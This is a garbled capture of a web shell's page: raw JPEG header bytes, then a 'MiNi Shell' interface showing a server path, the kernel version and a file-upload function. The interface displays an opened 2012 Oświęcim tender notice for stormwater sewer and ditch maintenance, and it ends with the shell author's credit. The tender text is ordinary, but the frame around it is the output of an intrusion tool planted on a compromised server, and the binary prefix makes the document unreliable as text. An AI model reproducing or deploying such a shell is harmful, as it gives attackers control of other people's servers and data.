JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121026/419534-N-2012.html

<p class="kh_header"><b>Oświęcim: Eksploatacja sieci kanalizacji opadowej łącznie z jej uzbrojeniem w skład której wchodzą wszystkie urządzenia  wraz z przepompownią wód opadowych na osiedlu Błonie oraz konserwacja rowów otwartych, polderu na os. Stare Stawy i piaskowników pozostających w administracji Gminy Miasto Oświęcim</b><br>
<b>Numer ogłoszenia: 419534 - 2012; data zamieszczenia: 26.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Oświęcim , ul.Zaborska 2, 32-600 Oświęcim, woj. małopolskie, tel. 033 8429311,8429311, faks 033 8429199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Eksploatacja sieci kanalizacji opadowej łącznie z jej uzbrojeniem w skład której wchodzą wszystkie urządzenia  wraz z przepompownią wód opadowych na osiedlu Błonie oraz konserwacja rowów otwartych, polderu na os. Stare Stawy i piaskowników pozostających w administracji Gminy Miasto Oświęcim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje wykonanie usługi w zakresie utrzymania w ciągłej sprawności technicznej oraz zapewnienie bezpiecznego funkcjonowania zintegrowanego systemu sieci i urządzeń kanalizacji deszczowej na terenie Miasta Oświęcim, w tym utrzymanie w sposób ciągły, również w dni wolne i święta, przez cały okres zamówienia drożności i sprawności sieci i urządzeń miejskiej sieci kanalizacji deszczowej w tym w szczególności:

1. Eksploatację sieci kanalizacji opadowej.

1) utrzymywanie przewodów kanalizacyjnych o przekrojach kołowych o średnicy       od fi 150 do fi 1000 oraz jajowych od fi 500/700 do fi 800/1200 jak również kolektora deszczowego fi 2400/1550 w pełnej i ciągłej sprawności technicznej przez systematyczną konserwację sieci polegającą na jej czyszczeniu, płukaniu, piłowaniu wewnątrz rurowym, frezowaniu, usuwaniu zatorów z wykorzystaniem specjalistycznego sprzętu,
2) zorganizowanie całodobowego dyżuru na terenie miasta Oświęcim, współpracującego ze służbami miejskimi, wyposażonego w niezbędny skład: - osobowy (posiadający dokładną znajomość sieci kanalizacyjnej na terenie miasta wraz z jej wyposażeniem i urządzeniami oraz znajomość zależności eksploatacyjnych w obrębie sieci kanalizacyjnej, możliwości wystąpienia awarii   i metod ich usuwania),
oraz - sprzętowy.
3) bezzwłoczne podejmowanie działań również w dni wolne i święta - na wniosek Zamawiającego, w sytuacjach awaryjnych, w szczególności w momencie zagrożenia przy deszczach nawalnych, wichurach, gwałtownych roztopach, cofkach, zanieczyszczeniu sieci i urządzeń kanalizacyjnych. Podjęcie przez służby techniczne działań eliminujących nieprawidłowości powstałych na sieci i urządzeniach kanalizacji  deszczowej w wyniku wystąpienia w wymienionych sytuacji w tym zabezpieczenie miejsc niebezpiecznych, powinno nastąpić w ciągu 60 minut od chwili ich telefonicznego zgłoszenia. 
4) usuwanie szkód (konserwacja budowlana) poprzez:
a) organizowanie usuwania szkód (meldunek powstania szkód, ustalenie sposobu usunięcia szkody, przeprowadzenie robót, udział w odbiorze i nadzorze robót, dokumentacja szkód i zakresu ich usunięcia),
b) naprawę i odnowę studzienek rewizyjnych w tym m. in.:
- uzupełnianie pokryw włazów studni rewizyjnych i rusztów krat ściekowych oraz innego uzbrojenia sieci kanalizacji deszczowej,
- naprawę i odnowę uszkodzonych studzienek rewizyjnych poprzez wymianę uszkodzonych włazów, kręgów wyrównawczych, stopni złazowych, usuwanie nieszczelności, naprawę dolnej części studzienek, regulację wysokościową kominów studni,
c) naprawę kanałów przełazowych i nieprzełazowych w tym:
- uszczelnianie połączeń,
- naprawę miejsc uszkodzonych,
- zastrzyki (iniekcje),
- wymianę pojedynczych lub kilku zniszczonych rur,
- wbudowanie dodatkowej studni rewizyjnej w miejscu uszkodzonym oraz wykonanie innych drobnych robót przywracających sprawność techniczną urządzeń sieci kanalizacyjnej,
5) prowadzenie stałego, w regularnych odstępach czasu, nadzoru kanałów i urządzeń kanalizacyjnych polegającego na kontroli wypełniania funkcji przez urządzenia odwadniające we wszystkich koniecznych i niezbędnych zakresach,
6) prowadzenie stałego nadzoru nad pracą przepompowni wód opadowych, które pracują w systemie bezobsługowym. Wykonywanie na obiektach napraw i konserwacji istniejących zespołów pompowych, czyszczenie zbiorników w ramach potrzeb min. 1 raz na pół roku, czyszczenie i usuwanie osadów ropopochodnych z istniejącego separatora. Dokonywanie przeglądów istniejącej rozdzielni energetycznej oraz szaf kontrolno sterujących. Utrzymywanie porządku i czystości na terenie obiektów i wokół niego w szczególności poprzez koszenie traw, usuwanie nieczystości w tym śmieci i liści oraz ich wywóz na składowisko odpadów komunalnych. Przepompownie zlokalizowane są przy ul. Jesionowej i ul. Zatorskiej w Oświęcimiu,
7) przegląd i konserwacja urządzeń na przelewach burzowych do rz. Soły i Wisły min. 1 raz na kwartał,
8) bieżąca konserwacja 7 szt.  separatorów poprzez utrzymywanie w pełnej sprawności technicznej. Wykaz separatorów znajduje się w poz. 21 załącznika  nr 7 do specyfikacji.

W kosztach kalkulacyjnych eksploatacji i czyszczenia separatorów należy uwzględnić:
- wizualne sprawdzenie stanu technicznego tj. drożność przepływu, stan pokryw separatora - 1 raz na miesiąc,
- usunięcie zanieczyszczeń pływających - 1 raz na kwartał,
- czyszczenie z osadów i substancji ropopochodnych - 1 raz na pół roku,
9) wykonywanie inspekcji telewizyjnej kanałów deszczowych zlokalizowanych na terenie miasta wraz z wykonaniem raportów po przeglądzie kanałów. Lokalizacja inspekcji będzie ustalana na bieżąco w trakcie realizacji umowy i dotyczy do 500 mb kanałów w czasie trwania umowy,
10) przejęcie obowiązków ochrony przeciwpowodziowej w zakresie przedsięwzięć niezbędnych w celu:
- uniknięcia szkodliwej, spowodowanej przez odbiornik cofki do urządzeń kanalizacji deszczowej,
- zabezpieczenia spływu ścieków deszczowych ujętych w systemy kanalizacyjne      przy zamkniętych wylotach,
11) współpraca z Miejskim Zespołem Zarządzania Kryzysowego w zakresie obsługi i sterowania istniejącymi wylotami i przelewami wód deszczowych do rzek Soły i Wisły,
12) uczestniczenie w naradach i posiedzeniach Miejskiego Zespołu Zarządzania Kryzysowego,
13) roboty powinny obejmować prace związane z przywracaniem terenu do stanu pierwotnego.
14) przy przeprowadzaniu koniecznych prac należy przestrzegać ustalonych zasad wynikających z ustaw i aktów wykonawczych dotyczących przedmiotu zamówienia.
15) remont ogrodzenia i bramy wokół piaskownika P2 w rejonie garaży przy ul. Szpitalnej (dł. ok. 82 mb) oraz wokół piaskownika P3 przy ul. Szpitalnej (dł. ok. 83 mb). 
Prace winny obejmować w szczególności:
- demontaż istniejącego ogrodzenia i transport odpadów na składowisko odpadów komunalnych w Oświęcimiu lub inne,
- zakup i montaż paneli ogrodzeniowych z pręta 5mm (ocynk., malowane), 
- zakup i montaż słupków ogrodzeniowych (ocynk., malowane),
- zakup i montaż bramy wjazdowej szer. 3,5 mb (ocynk., malowane).
16)  upoważnia się wykonawcę do zawierania umów na:
- monitoring lokalnego systemu alarmowego zainstalowanego w obiektach przepompowni wód opadowych przy ul. Jesionowej i ul. Zatorskiej w Oświęcimiu,
- konserwację wymienionego systemu alarmowego,
- dostawę wody i odprowadzanie ścieków oraz dostawę energii elektrycznej  do obiektów przepompowni wód opadowych przy ul. Jesionowej i ul. Zatorskiej w Oświęcimiu. Na wniosek Zamawiającego, Wykonawca dostarczy kserokopie zapłaconych faktur za wymienione prace. 
2. Konserwację rowów otwartych, polderu na os. Stare Stawy i piaskowników pozostających w administracji Gminy Miasto Oświęcim obejmującą:

1) bieżącą konserwacja rowów otwartych i piaskowników (3 szt. zlokalizowane wzdłuż Potoku Klucznikowskiego), która polegać ma na wykonaniu następujących prac:
- wykoszenie porostów z wygrabieniem ze skarp rowów,
- wykoszenie i wygrabienie porostów oraz samosiewów drzew i krzewów z terenów wokół piaskowników,
- odnowienie rynien dennych i płyt bocznych, profilowanie zboczy,
- odmulenie dna rowów i piaskowników,
- oczyszczenie z namułu istniejących przepustów,
- czyszczenie krat,
- oczyszczanie terenu po konserwacji z odwożeniem namułu, kamieni, trawy i innych zanieczyszczeń na składowisko odpadów komunalnych w Oświęcimiu lub inne,
2) wykonywanie zabiegów konserwacyjnych na odcinku Potoku Klucznikowskiego przed przepustem pod ul. Szpitalną (czyszczenie kraty), które obejmują wykonanie poniższych prac:
- odmulenie dna Potoku na odcinku 20 mb przed kratą,
- wywóz namułu i nagromadzonych zanieczyszczeń,
- oczyszczanie terenu po konserwacji z odwożeniem namułu, kamieni, trawy i innych zanieczyszczeń na składowisko odpadów komunalnych w Oświęcimiu i inne.
Powyższe prace będą wykonywane z częstotliwością raz na dwa tygodnie lub częściej w zależności od zaistniałej sytuacji związanej z nagromadzeniem się zanieczyszczeń na kracie.
3) wykonywanie prac konserwacyjnych na polderze zlokalizowanym na Os. Stare Stawy poprzez:
- wykoszenie porostów z wygrabieniem ze skarp,
- wykoszenie i wygrabienie porostów z terenów wokół polderu,
- odmulenie dna rowu biegnącego poprzez polder,
- oczyszczanie terenu po konserwacji z odwożeniem namułu, kamieni, trawy i innych  zanieczyszczeń na składowisko odpadów komunalnych w Oświęcimiu i inne,
4) wykonywanie prac związanych z czyszczeniem i udrażnianiem przepustu pod ul. Nową oraz ul. Pod Olszyną w terminach uzgodnionych z przedstawicielem Zamawiającego, nie więcej niż dwa razy w roku,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.47.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 5.000,00 zł (słownie: pięć tysięcy  złotych 00/100).
Wadium winno zostać wniesione przed upływem terminu składania ofert.
1)Wadium może być wniesione:
a)  w pieniądzu: 
- przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym w Zatorze
Nr 47 8136 0000 0031 0008 2000 0080. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c)  w gwarancjach bankowych,
d) w gwarancjach ubezpieczeniowych,
e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. (Dz. U Nr 109 poz. 1158 z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że posiada uprawnienia w zakresie odzysku lub unieszkodliwiania odpadów z czyszczenia kanalizacji opadowej lub sanitarnej w tym odpadów o kodzie 13 05 lub współpracuje z podmiotem gospodarczym uprawnionym do odzysku lub unieszkodliwiania odpadów z czyszczenia kanalizacji opadowej lub sanitarnej w tym odpadów o kodzie 13 05.
Opis sposobu oceny spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże wykonanie w okresie ostatnich 3 lat co najmniej 1 usługi w zakresie objętym przedmiotem zamówienia tj. z zakresu udrażniania lub czyszczenia kanalizacji deszczowej lub sanitarnej o wartości min. 100.000,00 zł brutto,
Opis sposobu oceny spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że dysponuje niezbędnym do wykonania zamówienia narzędziami i urządzeniami, w tym co najmniej specjalistycznym samochodem do ciśnieniowego czyszczenia kanalizacji wraz z osprzętem służącym do czyszczenia kanalizacji i do wycinania korzeni.
Opis sposobu oceny spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie treści art. 144 ustawy Pzp zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy za wyjątkiem przypadków określonych w niniejszej specyfikacji.
Dopuszcza się  zmianę umowy w następujących przypadkach: 
- zmiany maksymalnej wartości zobowiązań wynikającej z umowy w przypadku zmniejszenia zakresu przedmiotu zamówienia,
- zmiany stawki podatku od  towarów  i  usług VAT w okresie obowiązywania umowy, 
- z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
- z powodu działań osób trzecich uniemożliwiających wykonanie prac i robót, które to działania nie są konsekwencją winy którejkolwiek ze stron,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.oswiecim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Oświęcim, Wydział Zamówień Publicznych,  ul. Solskiego 2, pok 11, 32-600 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2012 godzina 10:00, miejsce: Urząd Miasta Oświęcim, ul. Zaborska 2 pok 01, 32-600 Oświęcim.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com